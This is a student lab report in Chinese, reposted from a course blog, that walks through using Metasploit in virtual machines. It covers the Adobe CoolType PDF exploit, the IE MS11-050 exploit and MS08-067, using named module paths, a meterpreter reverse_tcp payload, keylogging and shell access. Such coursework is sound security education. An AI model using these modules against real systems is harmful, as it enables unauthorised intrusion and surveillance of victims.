码迷,mamicode.com
首页 > 其他好文 > 详细

20145306 《网络攻防》 MSF基础应用

时间:2017-04-15 19:12:21      阅读:326      评论:0      收藏:0      [点我收藏+]

标签:form   shell   object   辅助   相同   logs   打开   options   ado   

20145306张文锦《网络对抗》MSF应用

 

Adobe阅读器渗透攻击

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通。

实验过程

  • 进入msfconsole。

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块;  使用命令set payload windows/meterpreter/reverse_tcp设置攻击载荷;设置端口,主机ip,产生pdf文件名。

  • 技术分享
  • show options显示攻击前所设置的数据。

  • 输入exploit,生成pdf文件,可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 技术分享
  • 主机开启监听模块。
  • 技术分享
  • 靶机运行pdf文件。
  • 攻击成功。
  • 技术分享

 

IE浏览器MS11050漏洞攻击

  • 两台虚拟机,主机(kali),靶机(windows xp sp3)

实验步骤

  • 在kali终端中开启msfconsole。
  • 输入命令use windows/browser/ms11050mshtml_cobjectelement,进入该漏洞模块,并设置参数。

  • 技术分享
  • exploit 生成一个网址。

  • 技术分享
  • 靶机打开http://10.43.61.249:8080/zwj。
  • 技术分享
  • 攻击成功,抓击键记录,获取shell。
  • 技术分享

MS08_067漏洞渗透攻击实践

实验前准备

  • 两台虚拟机,主机(kali),靶机(windows 2003 英文版)

实验过程

  • 主机kali的ip地址

  • 技术分享
  • windows ip
  • 技术分享
  • 使用ms 08——067模块,并设置载荷,主机ip,靶机ip。
  • 技术分享
  • 攻击成功。
  • 技术分享
  • 查看靶机ip。
  • 技术分享
  • 获取靶机shell。

MS08_067:meterpreter

  • 设置攻击模块,载荷,ip地址。
  • 技术分享
  • exploit。
  • 技术分享
  • 查看ip。
  • 技术分享
  • 查看进程。
  • 技术分享
  • meterpreter 获取 shell。
  • 技术分享

 

辅助模块

  • 主机 kali   靶机 windows xp sp 3 .

实验过程

  • show auxiliary查看攻击模块。
  • 设置参数。
  • 技术分享
  • exploit
  • 技术分享

 

实验后回答问题

1.用自己的话解释什么是exploit,payload,encode?

        Exploit 的英文意思就是利用,就是利用漏洞攻击。payload其实就是指载荷,运送到目标主机实现攻击。encode:对需要的文件进行编码。

实验总结与体会

  • 每个实验的步骤大致相同,首先用use使用攻击模块,然后有些需要set payload,之后show options ,照着将所需要的参数设置完整。

  • 比较重要的是将主机和靶机ping通。

20145306 《网络攻防》 MSF基础应用

标签:form   shell   object   辅助   相同   logs   打开   options   ado   

原文地址:http://www.cnblogs.com/besti145306/p/6715127.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!